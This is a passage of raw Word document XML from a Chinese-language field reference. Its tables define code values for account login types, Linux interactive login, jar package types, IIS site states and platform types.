      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1958"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="081993F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A18B8DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11787191" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54A99081" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A0E1872" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="584EEC55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accountLoginType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66CD6526" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70AE4EB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不可登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6BEA927C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39CCAB26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accountLoginType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BCEB38F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43CB5E39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>key登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0EA6EC43" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2102A0D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accountLoginType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CE08934" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CFC85D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pwd登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73D6DBC7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34C27C70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accountLoginType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="242CB413" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6204F925" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>key&amp;pwd登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14BA4B3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="270" w:name="linux交互登录方式"/>
      <w:bookmarkEnd w:id="269"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>linux交互登录方式</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2199"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3716C44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9E55D5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F3BC2CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32AD22A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58A8B46D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F746AF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>interactiveLoginType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3038BF7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C169041" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不可登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5DFC061D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B1E96E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>interactiveLoginType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F8F3B69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74E706C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不可交互登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E5B8876" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28837043" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>interactiveLoginType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55767921" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D11C912" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可交互登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="488EF74D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="271" w:name="jar包类型"/>
      <w:bookmarkEnd w:id="270"/>
      <w:r>
        <w:t>jar包类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="632"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1658"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1395FE2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FB2161F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E07723C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EB652DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6FFA4921" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C438FB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46ECEA6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09E9F8CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31E5AE2F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FD45878" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4052D992" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4571981F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统类库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15062417" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53582182" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="770A494C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60AAD6FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>web服务自带库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="237CE135" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27A35615" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="402A214C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B4C26E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>其他依赖包</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08D862B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="272" w:name="iis站点状态"/>
      <w:bookmarkEnd w:id="271"/>
      <w:r>
        <w:t>iis站点状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="685"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5B5F04E7"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04F72EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32F8B847" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AC24F0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7D1D3436" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="674BFCB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6929E5EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07665D7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>starting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="660874D4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6468F779" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29EAC08A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE930F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>started</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="00CD161F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D76E7F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05ACFD38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="587AF9C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>stopping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68BD2A93" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56D65A09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7848DCA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E456EED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>stopped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C17373F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="273" w:name="平台类型"/>
      <w:bookmarkEnd w:id="272"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>平台类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1071"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3EE6A5D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1AF50AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DB66F5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ADB01F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="705E8AEA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3174E593" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C980247" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E9C61BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="561506A4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76042B7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19055D9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE5059B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FAC9AD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="274" w:name="系统类型"/>
      <w:bookmarkEnd w:id="273"/>
      <w:r>
        <w:t>系统类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="889"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1071"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="212D56E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BBC2A95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CBA43EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
